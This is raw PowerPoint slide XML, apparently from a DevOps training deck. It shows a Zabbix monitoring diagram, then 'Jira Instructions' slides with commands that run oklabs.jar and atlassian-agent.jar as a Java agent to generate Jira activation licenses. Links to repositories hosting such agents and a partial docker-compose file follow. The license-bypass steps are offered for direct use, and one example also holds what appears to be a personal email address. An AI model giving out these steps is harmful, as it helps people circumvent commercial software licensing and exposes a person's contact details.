      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4946" name="Google Shape;4946;p805"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="174150" y="634050"/>
            <a:ext cx="8913425" cy="3875400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4950"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4951" name="Google Shape;4951;p806"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16310" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="54525" y="478625"/>
            <a:ext cx="8602123" cy="4049401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4955"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4956" name="Google Shape;4956;p807"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="41695" l="4450" r="81401" t="26327"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859725" y="69575"/>
            <a:ext cx="1250549" cy="1391900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4957" name="Google Shape;4957;p807"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5303" l="9658" r="5169" t="4354"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="437150" y="3429975"/>
            <a:ext cx="963700" cy="1022175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4958" name="Google Shape;4958;p807"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5303" l="9658" r="5169" t="4354"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1732550" y="3429975"/>
            <a:ext cx="963700" cy="1022175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4959" name="Google Shape;4959;p807"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5303" l="9658" r="5169" t="4354"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3104150" y="3429975"/>
            <a:ext cx="963700" cy="1022175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4960" name="Google Shape;4960;p807"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5303" l="9658" r="5169" t="4354"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4323350" y="3429975"/>
            <a:ext cx="963700" cy="1022175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4961" name="Google Shape;4961;p807"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5450150" y="3548700"/>
            <a:ext cx="3392700" cy="34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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…….</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n of PBX</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4962" name="Google Shape;4962;p807"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90325" y="4573375"/>
            <a:ext cx="13908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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zabbix-agent1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4963" name="Google Shape;4963;p807"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166525" y="3123950"/>
            <a:ext cx="13362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8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zabbix Host1</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4964" name="Google Shape;4964;p807"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461925" y="3123950"/>
            <a:ext cx="13362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8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zabbix Host2</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4965" name="Google Shape;4965;p807"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2833525" y="3123950"/>
            <a:ext cx="13362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8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zabbix Host3</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4966" name="Google Shape;4966;p807"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3976525" y="3123950"/>
            <a:ext cx="13362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8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zabbix Host4</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4967" name="Google Shape;4967;p807"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461925" y="4573375"/>
            <a:ext cx="13908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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zabbix-agent2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4968" name="Google Shape;4968;p807"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2833525" y="4573375"/>
            <a:ext cx="13908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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zabbix-agent3</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4969" name="Google Shape;4969;p807"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4052725" y="4573375"/>
            <a:ext cx="1390800" cy="2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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zabbix-agent4</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4970" name="Google Shape;4970;p807"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110275" y="549825"/>
            <a:ext cx="2155800" cy="61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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abbix-agent0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If we want to monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zabbix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> server itself</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4971" name="Google Shape;4971;p807"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1285200" y="1494125"/>
            <a:ext cx="2707800" cy="1467900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FE6700"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4972" name="Google Shape;4972;p807"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2405400" y="1505000"/>
            <a:ext cx="1805100" cy="1479000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FE6700"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4973" name="Google Shape;4973;p807"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3590850" y="1570225"/>
            <a:ext cx="684900" cy="1381200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FE6700"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4974" name="Google Shape;4974;p807"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4956" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4484999" y="1461475"/>
            <a:ext cx="41100" cy="1457100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FE6700"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4975" name="Google Shape;4975;p807"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1163025" y="1363825"/>
            <a:ext cx="2696700" cy="1478700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FE6700"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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9" name="Shape 4979"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4980" name="Google Shape;4980;p80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220">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jira Instructions</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4981" name="Google Shape;4981;p8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400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>java -jar oklabs.jar -m &lt;your email&gt; -o &lt;your organization&gt; -p &lt;product to activate&gt; -s &lt;Server ID&gt; &amp; Enter</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example j</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>export CATALINA_OPTS="-javaagent:/oklabs.jar”</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>java -jar oklabs.jar -m anildalar8888@gmail.com -o OKLABS -p jira -s BN3Z-Z9OH-ONEX-8YMH</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4985"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4986" name="Google Shape;4986;p809"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="417575"/>
            <a:ext cx="8520600" cy="415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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/anildalar/Jira-Working</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/TkachenkoSerg/Atlassian-Agent</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/haxqer/jira/tree/rm</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>docker exec jira-srv java -jar /var/agent/atlassian-agent.jar -d -p jira -m Hello@world.com -n Hello@world.com -o your-org -s you-server-id-xxxx</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4990"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4991" name="Google Shape;4991;p810"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="159450" y="58725"/>
            <a:ext cx="8520600" cy="4588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523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>services:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>  jira-service:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    image: atlassian/jira-software:latest</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    ports:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - "10000:8080"</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
